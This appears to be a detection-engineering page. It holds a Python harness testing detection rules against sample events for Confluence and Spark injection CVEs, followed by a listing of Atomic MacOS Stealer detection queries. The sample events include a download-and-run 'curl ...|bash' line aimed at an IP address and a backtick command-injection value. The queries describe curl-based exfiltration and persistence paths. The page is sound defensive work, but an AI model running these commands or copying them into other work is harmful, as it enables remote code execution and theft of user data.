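SAMPLE_EVENTS = [
    # Confluence JVM spawning a download-and-run one-liner after OGNL injection (CVE-2022-26134)
    {"ParentImage": "/opt/atlassian/confluence/jre/bin/java", "Image": "/usr/bin/bash",
     "CommandLine": "bash -c curl http://198.51.100.7/x.sh|bash"},
    # Benign child of the same JVM
    {"ParentImage": "/opt/atlassian/confluence/jre/bin/java", "Image": "/usr/bin/git",
     "CommandLine": "git --version"},
    # A JVM outside the Confluence install tree spawning curl: the path prefix keeps this out
    {"ParentImage": "/usr/lib/jvm/java-11/bin/java", "Image": "/usr/bin/curl",
     "CommandLine": "curl -s http://updates.internal/manifest"},
    # Spark group-mapping shell injection (CVE-2022-33891), shaped as the page's rule expects it
    {"ParentImage": "/usr/bin/bash", "Image": "/usr/bin/bash",
     "CommandLine": "bash -c id -Gn `touch /tmp/pwned`"},
    # Benign child of the Confluence JVM whose command line contains "dashboard"
    {"ParentImage": "/opt/atlassian/confluence/jre/bin/java", "Image": "/usr/bin/java",
     "CommandLine": "java -jar dashboard-export.jar"},
]

CONFLUENCE_TOKENS = ("/bin/sh", "bash", "dash", "ksh", "zsh", "csh", "fish", "curl", "wget", "python")


def rule_confluence_child(ev):
    """Parent is a java binary under the Confluence install tree and the child command line
    contains one of the shell/downloader tokens (substring match, as in the rule)."""
    parent = ev["ParentImage"]
    if not (parent.startswith("/opt/atlassian/confluence/") and parent.endswith("/java")):
        return False
    cl = ev["CommandLine"].lower()
    return any(tok in cl for tok in CONFLUENCE_TOKENS)


def rule_spark_proc(ev):
    """Parent is bash and the command line carries 'id -Gn' followed by a backtick or quote.
    Linux images end in '/bash'; the '\\bash' form from the page is accepted as well."""
    parent = ev["ParentImage"]
    if not (parent.endswith("/bash") or parent.endswith("\\bash")):
        return False
    cl = ev["CommandLine"]
    return "id -Gn `" in cl or "id -Gn '" in cl


RULES = {
    "confluence_cve_2022_26134": rule_confluence_child,
    "spark_shell_injection": rule_spark_proc,
}


def evaluate(events):
    """Return (event index, rule name) for every rule that fires."""
    return [(i, name) for i, ev in enumerate(events) for name, fn in RULES.items() if fn(ev)]


if __name__ == "__main__":
    for hit in evaluate(SAMPLE_EVENTS):
        print(hit)
```

Events 0 and 3 are the true positives; event 4 fires because of the "dash" token. If that noise shows up in your environment, tighten the Confluence rule by matching the child Image against a shell/downloader allowlist instead of substring-matching the command line.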
Atomic MacOS Stealer - FileGrabber Activity
Detects suspicious activity associated with Atomic MacOS Stealer (Amos) campaigns, including execution of FileGrabber and curl-based POST requests used for data exfiltration. The rule identifies either the execution of FileGrabber targeting /tmp or the use of curl to POST sensitive user data (including files such as /tmp/out.zip) to remote servers, which are key indicators of Amos infostealer activity.
Show query
any where (CommandLine:"*curl*" and CommandLine:"*POST*" and CommandLine:"*user:*" and CommandLine:"*-H *" and CommandLine:"*BuildID*" and CommandLine:"*file=@/tmp/out.zip*" and CommandLine:"*cl: 0*") or (CommandLine:"*FileGrabber*" and CommandLine:"*/tmp*")
Atomic MacOS Stealer - FileGrabber Activity
Detects suspicious activity associated with Atomic MacOS Stealer (Amos) campaigns, including execution of FileGrabber and curl-based POST requests used for data exfiltration. The rule identifies either the execution of FileGrabber targeting /tmp or the use of curl to POST sensitive user data (including files such as /tmp/out.zip) to remote servers, which are key indicators of Amos infostealer activity.
Show query
from * metadata _id, _index, _version | where (CommandLine like "*curl*" and CommandLine like "*POST*" and CommandLine like "*user:*" and CommandLine like "*-H *" and CommandLine like "*BuildID*" and CommandLine like "*file=@/tmp/out.zip*" and CommandLine like "*cl: 0*") or (CommandLine like "*FileGrabber*" and CommandLine like "*/tmp*")
Atomic MacOS Stealer - FileGrabber Activity
Detects suspicious activity associated with Atomic MacOS Stealer (Amos) campaigns, including execution of FileGrabber and curl-based POST requests used for data exfiltration. The rule identifies either the execution of FileGrabber targeting /tmp or the use of curl to POST sensitive user data (including files such as /tmp/out.zip) to remote servers, which are key indicators of Amos infostealer activity.
Show query
(CommandLine:*curl* AND CommandLine:*POST* AND CommandLine:*user\:* AND CommandLine:*\-H\ * AND CommandLine:*BuildID* AND CommandLine:*file\=@\/tmp\/out.zip* AND CommandLine:*cl\:\ 0*) OR (CommandLine:*FileGrabber* AND CommandLine:*\/tmp*)
Atomic MacOS Stealer - Persistence Indicators
Detects creation of persistence artifacts placed by Atomic MacOS Stealer in macOS systems. Recent Atomic MacOS Stealer variants have been observed dropping these to maintain persistent access after compromise.
Show query
any where (Image:"*/curl" and TargetFilename:"/Users/*" and TargetFilename:"*.helper") or TargetFilename:"/Library/LaunchDaemons/com.finder.helper.plist"
Atomic MacOS Stealer - Persistence Indicators
Detects creation of persistence artifacts placed by Atomic MacOS Stealer in macOS systems. Recent Atomic MacOS Stealer variants have been observed dropping these to maintain persistent access after compromise.
Show query
from * metadata _id, _index, _version | where (ends_with(Image, "/curl") and starts_with(TargetFilename, "/Users/") and ends_with(TargetFilename, ".helper")) or TargetFilename=="/Library/LaunchDaemons/com.finder.helper.plist"
Atomic MacOS Stealer - Persistence Indicators
Detects creation of persistence artifacts placed by Atomic MacOS Stealer in macOS systems. Recent Atomic MacOS Stealer variants have been observed dropping these to maintain persistent access after compromise.
Show query
(Image:*\/curl AND TargetFilename:\/Users\/* AND TargetFilename:*.helper) OR TargetFilename:\/Library\/LaunchDaemons\/com.finder.helper.plist
Showing 701-750 of 12,786